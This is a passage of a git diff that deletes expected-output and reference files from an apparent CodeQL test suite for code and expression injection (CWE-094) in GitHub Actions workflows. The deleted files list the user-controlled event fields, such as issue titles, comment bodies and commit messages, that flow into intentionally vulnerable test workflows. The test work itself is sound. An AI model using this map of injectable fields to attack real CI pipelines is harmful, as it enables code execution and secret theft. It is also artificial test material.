github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected deleted file mode 100644 index 697cf2a310e..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected +++ /dev/null @@ -1,14 +0,0 @@ -edges -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -nodes -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | -subpaths -#select -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref deleted file mode 100644 index 05ef02c5094..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref deleted file mode 100644 index 1745587e534..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected deleted file mode 100644 index f852a1b5981..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ /dev/null @@ -1,276 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | -| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | -| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | -| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | -| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | -| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | -| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| 